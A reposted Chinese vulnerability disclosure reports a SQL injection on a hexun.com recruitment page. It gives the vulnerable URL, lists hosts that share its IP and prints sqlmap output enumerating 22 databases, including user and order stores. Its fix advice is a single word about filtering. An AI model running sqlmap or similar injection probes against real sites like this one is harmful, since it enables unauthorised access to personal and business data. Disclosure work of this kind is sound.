神刀安全网

和讯网某站SQL注入漏洞(设计22个数据库)

简要描述:

sql注入怪物又来了!!

详细说明:

问题站点url:http://cvs.hexun.com/zhaopin/default.aspx?area=&posttype=%CA%B5%CF%B0%C0%E0

不多说直接sqlmap

和讯网某站SQL注入漏洞(设计22个数据库)

和讯网某站SQL注入漏洞(设计22个数据库)

有22个库,同ip站点如下

code 区域
www.homeway.net.cn 
页面504状态

2 sh.hexun.com
页面504状态

3 photo.seecaa.com
页面504状态

4 sh.homeway.com.cn
页面获取失败 『重试』

5 stockdata.homeway.com.cn
页面302跳转: http://stockdata.stock.hexun.c…

6 news.homeway.com.cn
页面获取失败 『重试』

7 money.homeway.com.cn
页面获取失败 『重试』

8 homeway.net.cn
页面504状态

9 insurance.homeway.com.cn
页面获取失败 『重试』

10 life.homeway.com.cn
页面504状态

11 datainfo.homeway.com.cn
页面获取失败 『重试』

12 wizard.homeway.com.cn
页面400状态

13 quote.homeway.com.cn
页面获取失败 『重试』

14 forex.homeway.com.cn
页面获取失败 『重试』

15 itv.homeway.com.cn
页面504状态

16 fangxinbao.com
放心保-和讯旗下互联网保险服务

17 other-cnc.cdn.hexun.com

还是挺危险的!!

code 区域
available databases [22]:
[*] DB_AGENT
[*] DB_BASE
[*] DB_BOOK
[*] DB_BUSI_CLUB
[*] DB_COUNTTOTAL
[*] DB_CRM_CLUB
[*] DB_HISTORY
[*] DB_INFO
[*] DB_KM_CLUB
[*] DB_LEAGUER
[*] DB_ORDER
[*] DB_ORDER_TEST
[*] DB_RELATEDARTICLE
[*] DB_REP_CLUB
[*] DB_USER
[*] DB_USERCENTER
[*] DB_WEB
[*] distribution
[*] master
[*] model
[*] msdb
[*] tempdb

漏洞证明:

和讯网某站SQL注入漏洞(设计22个数据库)

修复方案:

过滤等

版权声明:神刀安全网转自 Hxai11@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 和讯网某站SQL注入漏洞(设计22个数据库)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮